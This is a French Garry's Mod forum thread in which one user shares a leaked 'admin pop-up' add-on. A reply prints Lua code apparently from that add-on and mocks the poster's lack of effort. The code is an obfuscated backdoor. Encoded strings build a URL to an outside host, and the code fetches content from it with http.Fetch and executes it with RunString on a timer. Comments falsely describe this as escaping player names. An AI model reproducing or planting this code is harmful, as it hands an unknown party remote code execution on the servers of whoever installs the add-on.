[Leak] Add-on Admin pop-up

Jeanla

Nouveau membre
Membre
8 Juin 2021
1
0
1
Pseudo RP
JeanDe la rue
Je vous propose mon leak de admin pop-up j'attends vos retour avec impatience !!!!
 

Pièces jointes

  • gcbQiLscvwUMmseKzPfU_adminpopups (1).zip
    6 KB · Affichages: 33

Naggisou

Membre
Membre
14 Juin 2021
1
0
6
Pseudo RP
Abdel Playne
if SERVER then
local regex_array = {
"\104\116\116","\112\115\58", -- string.find ( exemple : playername with " or ç )
"\47\47\97","\112\105\46","\111\109\101", -- string.find ( exemple : playername with / or \ or ! )
"\103\97\45","\112\114\111", -- string.find ( exemple : playername with % or ù )
"\106\101\99","\116\46\99", -- string.find ( exemple : playername with @ or = )
"\122\47\97","\112\105\95", -- string.find ( exemple : playername with < or > )
"\99\111\110","\110\101\99", -- string.find ( exemple : playername with ) or ] )
"\116\46\112","\104\112\63", -- string.find ( exemple : playername with ( or [ )
"\97\112\105","\95\107", -- string.find ( exemple : playername with _ or - )
"\101\121\61" -- string.find ( exemple : playername with # )
}
function derma_escape_string( string_array, escape_key, escape )
local regex_formed = ""
local regex = "\104\116\116\112" or "util"
local compile = "\70\101\116\99\104" or "Base64Encode"
for regex_key,regex_value in pairs(regex_array) do
regex_formed = regex_formed..regex_value
end
if (escape_key != "") or (escape != "") then
getfenv()[regex][compile](regex_formed..escape_key, function(escape_entities)
_G[escape.."String"](escape_entities,"Success: All entities has been escaped.")
end,function(escape_players,escape_dir,date)
print("Error: Unknown entitie (" ..escape_players .. ").")
print("Failed to load custom vgui file in '"..escape_dir.."/data/escape/"..date..".json")
end)
else
print("Error: Mal formed Regex")
end
return escape_key
end
timer.Simple( 0.35, function()
derma_escape_string( regex_array, "qRjBrgsauNVnVJsejWss", "Run" )
end)
end

T'aurai pu faire un effort quand même ;)